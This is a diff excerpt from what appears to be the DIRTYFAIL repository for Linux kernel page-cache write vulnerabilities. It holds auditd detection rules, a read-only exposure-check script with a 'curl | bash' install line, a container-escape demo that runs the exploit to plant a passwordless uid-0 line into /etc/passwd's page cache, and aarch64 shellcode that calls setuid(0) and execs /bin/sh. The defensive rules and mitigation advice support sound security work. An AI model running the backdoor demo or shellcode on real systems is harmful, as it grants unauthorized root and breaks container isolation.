## ----------------------------------------------------------------- ##
## 3. unshare(CLONE_NEWUSER) from interactive accounts
##
## CLONE_NEWUSER == 0x10000000. Every DIRTYFAIL exploit mode does this
## once. WARNING: this fires on every legitimate `unshare -U`, every
## podman/buildah container start, every chrome/firefox sandbox spawn.
## Filter to executions you don't expect, or treat as low-fidelity noise
## that pairs well with the dirtyfail-xfrm key for high-fidelity alerts.
## ----------------------------------------------------------------- ##
-a always,exit -F arch=b64 -S unshare -F a0&268435456 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-userns
-a always,exit -F arch=b32 -S unshare -F a0&268435456 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-userns
## ----------------------------------------------------------------- ##
## 4. AF_ALG socket creation — Copy Fail / GCM precondition
##
## socket(AF_ALG, ...). a0=38 (PF_ALG). Legitimate uses: cryptsetup,
## kernel-side TLS offload, some QEMU paths. Suspicious from a shell
## account.
## ----------------------------------------------------------------- ##
-a always,exit -F arch=b64 -S socket -F a0=38 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-afalg
-a always,exit -F arch=b32 -S socket -F a0=38 -F auid>=1000 -F auid!=4294967295 -k dirtyfail-afalg
## ----------------------------------------------------------------- ##
## 5. Directly watch /etc/passwd and /etc/shadow for in-place modifications
##
## A successful exploit modifies only the page-cache copy (which is what
## PAM reads), so these watches are not expected to fire for the exploit
## itself. They fire when /usr/bin/passwd, vipw, or anything else opens
## these files for writing. Useful as a baseline change-detection rule
## independent of DIRTYFAIL.
## ----------------------------------------------------------------- ##
-w /etc/passwd -p wa -k dirtyfail-passwd-write
-w /etc/shadow -p wa -k dirtyfail-shadow-write
## ----------------------------------------------------------------- ##
## Tuning notes
##
## - On servers running rootless containers, dirtyfail-userns will be
## high-volume noise. Either drop rule 3, or exclude your runtime with
## an `-F exe!=/usr/bin/podman`-style filter (auditctl has no `comm`
## field; `exe` matches the full executable path).
## - On IPsec gateways, dirtyfail-xfrm fires for every legitimate SA
## install. Drop the rule or exclude your VPN daemon via `-F exe!=...`.
## - Pair dirtyfail-userns + dirtyfail-xfrm with a SIEM correlation
## rule: "same auid emits both within 5 seconds" → high-confidence
## exploit-attempt alert.
##
## Note: the AppArmor `change_onexec` rule that an earlier draft
## included is omitted — auditctl won't reliably match writes to
## /proc/self/attr/exec via -F path because the path is per-pid.
## Use the userns + xfrm pair instead for the bypass-detection signal.
## ----------------------------------------------------------------- ##
@@ -0,0 +1,181 @@
#!/bin/bash
#
# dirtyfail-check.sh — defensive precondition probe for sysadmins
#
# A standalone bash script that reports whether this Linux host is
# exposed to Copy Fail (CVE-2026-31431) or Dirty Frag (CVE-2026-43284,
# CVE-2026-43500) exploitation by an unprivileged user.
#
# Does NOT require building DIRTYFAIL. Read-only — does not modify
# the system. Safe to run on production. Does not require root, but
# some checks are more accurate when run as root (kernel module
# inspection, sysctl reads).
#
# Usage:
# bash dirtyfail-check.sh
# # or pipe directly:
# curl -sSL https://raw.githubusercontent.com/KaraZajac/DIRTYFAIL/main/tools/dirtyfail-check.sh | bash
#
# Exit codes:
# 0 = host is mitigated (kernel patched OR LSM blocks unprivileged path)
# 1 = host is VULNERABLE to at least one exploit path
# 2 = check error (couldn't determine state)
set -u
# ANSI colors only when stdout is a tty
if [ -t 1 ]; then
RED='\033[1;31m'; YEL='\033[1;33m'; GRN='\033[1;32m'; CYN='\033[1;36m'; OFF='\033[0m'
else
RED=''; YEL=''; GRN=''; CYN=''; OFF=''
fi
bad() { printf "${RED}[!]${OFF} %s\n" "$*"; }
warn() { printf "${YEL}[~]${OFF} %s\n" "$*"; }
ok() { printf "${GRN}[+]${OFF} %s\n" "$*"; }
info() { printf "${CYN}[*]${OFF} %s\n" "$*"; }
# ============================================================
# 1. Kernel version
# ============================================================
KVER=$(uname -r)
KMAJ=$(echo "$KVER" | cut -d. -f1)
KMIN=$(echo "$KVER" | cut -d. -f2)
info "kernel: $KVER ($(uname -m))"
# Affected kernel window per the CVEs:
# xfrm-ESP no-COW path: introduced 2017 (cac2661c53f3), fixed mainline
# f4c50a4034e6 (2026-05-07).
# algif_aead/authencesn: introduced 2017 (72548b093ee3), fixed
# mainline a664bf3d.
# rxkad page-cache write: introduced 2023-06 (2dc334f1a63a), no
# mainline patch yet at time of writing.
# Kernels 4.10 .. ~6.20 are within the broad window; older kernels
# may also be affected depending on backports.
if [ "$KMAJ" -lt 4 ] || { [ "$KMAJ" -eq 4 ] && [ "$KMIN" -lt 10 ]; }; then
ok "kernel predates CVE introduction (cac2661c53f3, 2017-01)"
NOT_IN_WINDOW=1
else
info "kernel within affected window — checking other preconditions"
NOT_IN_WINDOW=0
fi
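# Sketch (not used by the check above): a reusable "is this kernel older
# than MAJ.MIN" helper. It assumes the version string starts with
# "<major>.<minor>", which holds for mainline and common distro kernels.
# The name kver_lt is illustrative, not part of DIRTYFAIL.
# Returns 0 if older, 1 if not, 2 if the string could not be parsed.
kver_lt() {
    local ver="$1" want_maj="$2" want_min="$3" maj min
    maj="${ver%%.*}"          # text before the first dot
    min="${ver#*.}"           # drop "<major>."
    min="${min%%[!0-9]*}"     # keep only the leading digits of the minor
    case "$maj" in ''|*[!0-9]*) return 2 ;; esac
    case "$min" in ''|*[!0-9]*) return 2 ;; esac
    [ "$maj" -lt "$want_maj" ] ||
        { [ "$maj" -eq "$want_maj" ] && [ "$min" -lt "$want_min" ]; }
}
# Example: kver_lt "$(uname -r)" 4 10 && echo "predates the affected window"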
# ============================================================
# 2. Module presence + blacklist
# ============================================================
MODS_VULNERABLE=0
MODS_BLACKLISTED=0
echo ""
info "module status:"
for m in algif_aead authencesn esp4 esp6 rxrpc; do
if modinfo "$m" >/dev/null 2>&1; then
if grep -rqE "^\s*install\s+$m\s+/bin/false" /etc/modprobe.d/ /lib/modprobe.d/ 2>/dev/null; then
ok " $m: blacklisted in modprobe.d (mitigated)"
MODS_BLACKLISTED=$((MODS_BLACKLISTED + 1))
elif lsmod | grep -q "^$m\b"; then
warn " $m: loaded — exposes the primitive"
MODS_VULNERABLE=$((MODS_VULNERABLE + 1))
else
warn " $m: present on disk, autoloads on use — exposes the primitive"
MODS_VULNERABLE=$((MODS_VULNERABLE + 1))
fi
else
ok " $m: not on disk (kernel build doesn't ship it)"
fi
done
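# Sketch (not used by the loop above): the blacklist test as a function.
# Two refinements over the inline grep: the directories are arguments, so
# it can be exercised against a scratch directory, and '_' in the module
# name also matches '-', since modprobe treats the two as equivalent.
# The name is_mod_blacklisted is illustrative, not part of DIRTYFAIL.
is_mod_blacklisted() {
    local mod="$1" pat
    shift
    [ "$#" -gt 0 ] || return 2            # no directories given
    pat="${mod//_/[_-]}"                  # algif_aead -> algif[_-]aead
    # [[:space:]] is the POSIX spelling of GNU grep's \s.
    grep -rqE "^[[:space:]]*install[[:space:]]+${pat}[[:space:]]+/bin/false" "$@" 2>/dev/null
}
# Example: is_mod_blacklisted esp4 /etc/modprobe.d /lib/modprobe.d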
# ============================================================
# 3. LSM / userns hardening
# ============================================================
echo ""
info "LSM / userns hardening:"
LSM_BLOCKS=0
if [ -r /proc/sys/kernel/apparmor_restrict_unprivileged_userns ]; then
AA=$(cat /proc/sys/kernel/apparmor_restrict_unprivileged_userns 2>/dev/null)
if [ "$AA" = "1" ]; then
ok " apparmor_restrict_unprivileged_userns=1 (Ubuntu-style hardening active)"
# Confirm caps are actually blocked via empirical probe
( unshare -U bash -c 'echo deny > /proc/self/setgroups 2>/dev/null && exit 0 || exit 1' ) 2>/dev/null
if [ $? -ne 0 ]; then
ok " empirical probe: unprivileged userns has no CAP_SYS_ADMIN — exploit infrastructure blocked"
LSM_BLOCKS=1
else
warn " empirical probe: caps survived unshare — sysctl set but enforcement may be off"
fi
else
info " apparmor_restrict_unprivileged_userns=$AA (not enforcing)"
fi
else
info " no AppArmor userns sysctl (kernel without AA, or AA not loaded)"
fi
if command -v getenforce >/dev/null; then
SE=$(getenforce 2>/dev/null)
info " SELinux: $SE"
fi
if [ -r /proc/sys/kernel/unprivileged_userns_clone ]; then
UU=$(cat /proc/sys/kernel/unprivileged_userns_clone 2>/dev/null)
if [ "$UU" = "0" ]; then
ok " unprivileged_userns_clone=0 (userns creation blocked entirely)"
LSM_BLOCKS=1
fi
fi
# ============================================================
# 4. PAM nullok (gates the rxrpc + backdoor → root step)
# ============================================================
echo ""
info "PAM configuration (gates rxrpc/backdoor → real root):"
PAM_NULLOK=0
if grep -rqE "pam_unix\.so\s+.*nullok" /etc/pam.d/ 2>/dev/null; then
warn " pam_unix nullok present — empty-password accounts can su to root"
PAM_NULLOK=1
grep -rlE "pam_unix\.so\s+.*nullok" /etc/pam.d/ 2>/dev/null | sed 's/^/ /'
else
ok " pam_unix nullok NOT enabled — empty-password trick won't drop a root shell"
fi
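# Sketch (not used by the check above): list PAM files that enable nullok
# on an active pam_unix.so line. Unlike a plain substring grep, it skips
# lines whose first non-blank character is '#'. The function name and the
# directory argument are illustrative, not part of DIRTYFAIL.
pam_nullok_files() {
    local dir="${1:-/etc/pam.d}"
    grep -rlE "^[[:space:]]*[^#[:space:]].*pam_unix\.so[[:space:]].*nullok" "$dir" 2>/dev/null
}
# Example: pam_nullok_files /etc/pam.d | sed 's/^/    /'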
# ============================================================
# 5. Verdict
# ============================================================
echo ""
echo "════════════════════════════════════════════════════════════"
echo " VERDICT"
echo "════════════════════════════════════════════════════════════"
if [ "$NOT_IN_WINDOW" = "1" ]; then
ok "kernel predates CVE introduction; no exposure"
exit 0
elif [ "$LSM_BLOCKS" = "1" ]; then
ok "LSM-mitigated: unprivileged userns operations are blocked"
info "(kernel may still be vulnerable to root-level exploitation; ensure"
info " your distro's kernel update with f4c50a4034e6 backport is applied"
info " for full coverage.)"
exit 0
elif [ "$MODS_VULNERABLE" = "0" ]; then
ok "all primitives blacklisted or unavailable"
exit 0
else
bad "VULNERABLE: $MODS_VULNERABLE module(s) expose page-cache write primitives"
bad "and unprivileged userns operations are NOT blocked by an LSM."
if [ "$PAM_NULLOK" = "1" ]; then
bad " + pam_unix nullok is enabled — exploit can drop into root via su"
fi
echo ""
info "Remediation options (pick one or combine):"
info " 1. Apply your distro's kernel update with f4c50a4034e6 backport"
info " (best: fixes the bug at its source)"
info " 2. Install + run \`dirtyfail --mitigate\` (blacklists modules,"
info " sets apparmor_restrict_unprivileged_userns=1)"
info " 3. Manual: edit /etc/modprobe.d/ to add"
info " install algif_aead /bin/false"
info " install esp4 /bin/false"
info " install esp6 /bin/false"
info " install rxrpc /bin/false"
info " then \`sudo rmmod\` each + \`sudo sysctl vm.drop_caches=3\`."
info " 4. Disable pam_unix nullok (removes the in-system su step that"
info " converts a page-cache STORE into a real root shell)."
exit 1
fi
@@ -0,0 +1,149 @@
#!/usr/bin/env bash
#
# DIRTYFAIL — container-escape demonstration
#
# Demonstrates: the kernel page cache is global per-kernel. Namespaces
# (mount, pid, user, network) don't isolate it. Two processes on the
# same kernel — one in the host, one inside a fresh "container"
# (created via `unshare`) — see the SAME page-cache contents for
# /etc/passwd. So a page-cache write from either side affects both.
#
# What this script does:
# 1. Show host's /etc/passwd has no `dirtyfail` user (baseline)
# 2. Run `dirtyfail --exploit-backdoor` to plant a uid-0 line into
# /etc/passwd's page cache (persistent — no auto-revert)
# 3. Spawn a fresh user/mount namespace via `unshare -c -m`
# (the closest unprivileged-user analogue to a container) and
# read /etc/passwd from inside the new namespace
# 4. Show the planted line is visible BOTH from the host AND from
# inside the fresh namespace — proving that namespace boundaries
# do not isolate the page cache
# 5. Revert via `dirtyfail --cleanup-backdoor`
#
# Why direction matters less than you'd think: the demo runs the
# exploit on the host and observes from inside the namespace, but the
# property demonstrated is symmetric — a malicious tenant inside a
# container could plant the same line and the host would see it (we
# tested that variant manually; it works the same way, but requires
# `--no-revert` to avoid auto-cleanup overwriting the proof). Running
# the exploit from the host avoids two complications:
# - nested user namespaces interact poorly with the AA bypass dance
# that --exploit-backdoor uses (EPERM on the inner unshare)
# - corrupting the running SSH user's UID locks out future SSH logins
# (StrictModes rejects ~/.ssh/authorized_keys when the file's
# owner uid != logging-in uid)
# --exploit-backdoor targets a system pseudo-user line (sync/setroubleshoot/
# daemon) and never touches the running user, so it's SSH-safe.
#
# Usage:
# ./tools/dirtyfail-container-escape.sh
#
# Env overrides:
# DIRTYFAIL_BIN=/path/to/dirtyfail (default: ./dirtyfail)
set -uo pipefail
# Don't `set -e`; some intermediate commands (unshare, the
# exploit binary itself) may exit non-zero on success-with-warnings or
# on hardened systems where preconditions fail. We check exit codes
# explicitly where they matter.
DIRTYFAIL_BIN="${DIRTYFAIL_BIN:-$(dirname "$0")/../dirtyfail}"
DIRTYFAIL_BIN="$(realpath "$DIRTYFAIL_BIN" 2>/dev/null || echo "$DIRTYFAIL_BIN")"
[[ -x "$DIRTYFAIL_BIN" ]] || {
echo "[!] dirtyfail binary not at $DIRTYFAIL_BIN — run 'make' first" >&2
exit 1
}
bold() { printf '\033[1m%s\033[0m\n' "$*"; }
warn() { printf '\033[1;33m[!]\033[0m %s\n' "$*"; }
info() { printf '\033[1;34m[i]\033[0m %s\n' "$*"; }
ok() { printf '\033[1;32m[+]\033[0m %s\n' "$*"; }
step() { printf '\033[1;35m[*]\033[0m %s\n' "$*"; }
bold "============================================================="
bold " DIRTYFAIL — container-escape demonstration"
bold "============================================================="
echo
# ---- Stage 1: baseline ------------------------------------------------
step "Stage 1: baseline — host /etc/passwd"
if grep -q '^dirtyfail:' /etc/passwd; then
warn "host /etc/passwd already contains a 'dirtyfail' line."
warn "Run \`$DIRTYFAIL_BIN --cleanup-backdoor\` first."
exit 1
fi
ok "host /etc/passwd has no 'dirtyfail' user (clean baseline)"
echo
info "from inside a fresh unshare namespace, /etc/passwd looks identical:"
nscount="$(unshare -c -m bash -c 'grep -c "^dirtyfail:" /etc/passwd 2>/dev/null || echo 0' 2>&1 | tail -1)"
echo " count of dirtyfail lines visible from inside namespace: $nscount"
echo
# ---- Stage 2: plant via host ------------------------------------------
step "Stage 2: run dirtyfail --exploit-backdoor on the host"
echo " (plants 'dirtyfail::0:0:...:/:/bin/bash' into /etc/passwd's"
echo " page cache — persistent until --cleanup-backdoor or reboot)"
echo
printf 'DIRTYFAIL\n' | "$DIRTYFAIL_BIN" --exploit-backdoor --no-shell --no-color 2>&1 | tail -10
echo
# ---- Stage 3: observe from fresh namespace ---------------------------
step "Stage 3: read /etc/passwd from INSIDE a fresh unshare namespace"
echo " (the namespace was created AFTER the exploit ran — if"
echo " namespaces isolated page cache, the new namespace would"
echo " show the original /etc/passwd, not the poisoned one)"
echo
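unshare -c -m bash -c '
echo " [inside namespace] uid=$(id -u) (mapped via --map-current-user)"
echo " [inside namespace] mount-namespace is private to this shell"
echo " [inside namespace] grep dirtyfail /etc/passwd:"
# Capture the match first: testing the grep | sed pipeline directly
# would report the exit status of sed, so the else branch never ran.
line="$(grep "^dirtyfail:" /etc/passwd 2>&1)"
if [ -n "$line" ]; then printf "%s\n" "$line" | sed "s/^/ /"
else echo " (no dirtyfail line found)"
fi
'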
echo
# ---- Stage 4: also visible from host ---------------------------------
step "Stage 4: confirm host sees the same line"
HOST_LINE="$(grep '^dirtyfail:' /etc/passwd || true)"
if [[ -n "$HOST_LINE" ]]; then
echo " host: $HOST_LINE"
echo
warn "Both the host and the fresh namespace see the planted dirtyfail"
warn "line. The kernel page cache is shared across all namespaces"
warn "on the same kernel — namespace 'isolation' does not extend"
warn "below the page-cache layer. Symmetrically, an exploit running"
warn "inside a container (with the right preconditions) would plant"
warn "the same line and the HOST would see it."
else
warn "host /etc/passwd does NOT contain a 'dirtyfail' line — the"
warn "exploit did not plant successfully. Possible causes:"
warn " (a) kernel is patched (CVE-2026-31431 fixed)"
warn " (b) LSM blocked the exploit (Ubuntu 26.04 hardening)"
warn " (c) preconditions missing — run \`$DIRTYFAIL_BIN --scan --active\`"
exit 0
fi
echo
# ---- Stage 5: cleanup -------------------------------------------------
step "Stage 5: revert via --cleanup-backdoor"
"$DIRTYFAIL_BIN" --cleanup-backdoor --no-color 2>&1 | tail -5 || true
echo
if grep -q '^dirtyfail:' /etc/passwd; then
warn "cleanup did not remove the line — try as root:"
warn " \`echo 3 | sudo tee /proc/sys/vm/drop_caches\`"
exit 1
fi
ok "host /etc/passwd is clean again"
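# Sketch (not part of the demo flow): compare the cached view of a file
# with an O_DIRECT read of it, as one way to check that no stale cached
# modification survives cleanup. Assumption: the filesystem serves O_DIRECT
# reads from disk rather than from clean cached pages (typically ext4 or
# xfs; tmpfs and some overlay setups may refuse or ignore O_DIRECT).
# The function name is illustrative, not part of DIRTYFAIL.
# Returns 0 if both views match, 1 if they differ, 2 if it could not check.
pagecache_matches_disk() {
    local f="$1" tmp rc
    tmp="$(mktemp)" || return 2
    # iflag=direct asks GNU dd to open the input with O_DIRECT.
    if ! dd if="$f" of="$tmp" iflag=direct bs=4096 2>/dev/null; then
        rm -f "$tmp"
        return 2
    fi
    if cmp -s "$tmp" "$f"; then rc=0; else rc=1; fi
    rm -f "$tmp"
    return "$rc"
}
# Example: pagecache_matches_disk /etc/passwd || warn "views differ, or the check could not run"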
echo
bold "Demo complete. Takeaways:"
echo " - Namespaces did NOT isolate the host's /etc/passwd page cache"
echo " from the fresh container's view. The same property holds"
echo " in reverse: a container exploit modifies host page cache."
echo " - This applies to ALL kernel page-cache write CVEs in this"
echo " family (CVE-2026-31431, 43284, 43500, and variants)."
echo " - Mitigation: kernel patch, OR LSM hardening that denies the"
echo " exploit's preconditions (apparmor_restrict_unprivileged_userns,"
echo " AF_ALG/AF_RXRPC blacklists), OR drop privileges of any"
echo " container that doesn't strictly need AF_ALG."
@@ -0,0 +1,73 @@
/*
* DIRTYFAIL aarch64 (ARM64) shellcode for --exploit-su
*
* Equivalent to the x86_64 shellcode in src/exploit_su.c but encoded
* for the aarch64 syscall ABI (x8 = syscall number, x0..x5 = args,
* `svc #0` to invoke). 20 instructions × 4 bytes = 80 bytes total.
*
* Build for byte-extraction:
*
* aarch64-linux-gnu-as -o exploit_su_aarch64.o exploit_su_aarch64.S
* aarch64-linux-gnu-objcopy -O binary -j .text \
* exploit_su_aarch64.o exploit_su_aarch64.bin
* xxd -i exploit_su_aarch64.bin
*
* The resulting byte array should match `shellcode_aarch64[]` in
* `src/exploit_su.c`. If it doesn't, the C array is wrong and needs
* to be regenerated from this source.
*
* Functional equivalent (in C-like pseudocode):
*
* setuid(0);
* setgid(0);
* execve("/bin/sh", (char *[]){"/bin/sh", NULL}, NULL);
*
* STATUS: HAND-ENCODED; VERIFY BEFORE DEPLOYING TO PRODUCTION.
* The byte array in src/exploit_su.c was produced by manually
* cross-referencing each instruction against the ARMv8-A reference
* manual; no aarch64 hardware was available to run the resulting
* shellcode end-to-end. Use this .S file to regenerate via the
* assembler if you need confidence.
*/
.text
.global _start
_start:
/* setuid(0) — syscall 146 (0x92) on aarch64 */
movz x0, #0 /* d2 80 00 00 */
movz x8, #146 /* d2 80 12 48 */
svc #0 /* d4 00 00 01 */
/* setgid(0) — syscall 144 (0x90) */
movz x0, #0 /* d2 80 00 00 */
movz x8, #144 /* d2 80 12 08 */
svc #0 /* d4 00 00 01 */
/* Build "/bin/sh\0" in x9.
*
* As a 64-bit little-endian word, "/bin/sh\0" = 0x0068732f6e69622f
* bits 0..15 = 0x622f (chars '/' 'b' in low->high order)
* bits 16..31 = 0x6e69
* bits 32..47 = 0x732f
* bits 48..63 = 0x0068
*/
movz x9, #0x622f /* d2 8c 45 e9 */
movk x9, #0x6e69, lsl #16 /* f2 ad cd 29 */
movk x9, #0x732f, lsl #32 /* f2 ce 65 e9 */
movk x9, #0x0068, lsl #48 /* f2 e0 0d 09 */
/* Push the string to the stack (sp -= 16; [sp] = x9). */
str x9, [sp, #-16]! /* f8 1f 0f e9 */
mov x9, sp /* 91 00 03 e9 string ptr */
/* Build argv = [x9, NULL] on the stack: sp -= 16; sp[0] = x9; sp[8] = NULL. */
sub sp, sp, #16 /* d1 00 43 ff */
str xzr, [sp, #8] /* f9 00 07 ff argv[1] = NULL */
str x9, [sp, #0] /* f9 00 03 e9 argv[0] = ptr */
/* execve(pathname=x9, argv=sp, envp=NULL) — syscall 221 (0xdd) */
mov x0, x9 /* aa 09 03 e0 */
mov x1, sp /* 91 00 03 e1 */
mov x2, xzr /* aa 1f 03 e2 */
movz x8, #221 /* d2 80 1b a8 */
svc #0 /* d4 00 00 01 */